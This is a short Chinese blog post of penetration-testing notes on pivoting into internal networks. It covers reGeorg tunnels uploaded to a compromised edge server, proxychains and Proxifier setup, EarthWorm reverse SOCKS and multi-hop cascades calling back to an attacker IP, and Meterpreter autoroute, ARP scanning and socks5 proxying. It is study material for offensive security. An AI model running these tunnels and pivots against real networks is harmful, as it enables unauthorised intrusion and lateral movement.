2019-12-20:端口转发和代理,笔记

内网转发和代理,一层代理
reGeorg+proxifier
1,将reGeorg里的对应服务器语言的tunnel文件上传到边沿机,然后访问tunnel文件,提示all seems fine才算成功,成功之后复制url
2,运行python reGeorgSocksProxy.py -u url -p 端口 ,运行之后也提示all seems fine就算准备完成
3,打开proxifier,添加代理服务器,proxy server ,地址127.0.0.1 端口为regeorg设置的端口,使用socks 4
4,打开proxification rules代理规则,选择使用之前添加的代理服务器,direct模式为使用该代理

linux下使用proxychains代理
1,将reGeorg里的对应服务器语言的tunnel文件上传到边沿机,然后访问tunnel文件,提示all seems fine才算成功,成功之后复制url
2,运行python reGeorgSocksProxy.py -u url -p 端口 ,运行之后也提示all seems fine就算准备完成
3,修改/etc/proxychains.conf配置文件,添加代理服务器
格式如下
socket4代理模式 127.0.0.1 1234端口

reGeorg+sockscap64
sockscap64新建代理服务器,设置好之后,添加需要使用代理的程序,运行即可

ew代理,socks协议,
-s 指定链路状态,6种
-l 本地监听的端口
-d 指定转发或者反弹的主机地址
-e 指定转发或者反弹的主机端口
-f 连接或者映射的主机地址
-g 连接或者映射的主机端口

正向代理,肉鸡,ew -s ssocksd -l 1080 需要在目标机中开启一个端口
反向代理,公网Ip的主机,ew -s rcsocks -l 1080 8888 监听端口
肉鸡 ew -s rssocks -d 攻击机ip -e 8888
多级级联
公网ip开通通道 监听通道端口 ew -s lcx_listen -l 1080 -e 8888
靶机执行,ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999,将内网靶机的ip 999端口,映射到1080端口
靶机执行,ew -s lcx_slave -d 攻击机ip -e 8888 -f 2.2.2.3转发的主机ip -g转发的端口 9999 , -f是当前靶机ip也可以是内网中其他主机的ip

三级级联
ew -s rcsocks -l 1080 -e 8888
ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
ew -s lcx_listen -l 9999 -e 7777
ew -s rssocks -d 127.0.0.1 -e 7777

meterpreter内网渗透
1,获得边沿机session之后,首先收集信息,如ip地址,看网段,之后设置路由,run autoroute -s 10.10.10.0/24 , run post/multi/manage/autoroute 自动设置路由
2,扫描内网机器,ip扫描和端口扫描,run post/windows/gather/arp_scanner rhosts=10.10.10.0/24,run arp_scanner -r 10.10.10.0/24, 扫端口use auxiliary/scanner/portscan/tcp
3,设置代理,use auxiliary/server/socks5 ,配置代理软件vim /etc/proxychains.conf,添加代理服务器和端口,然后使用proxychains nmap 来尝试扫描探测

posted @ 2019-12-20 08:29  bonga  阅读(624)  评论(0编辑  收藏  举报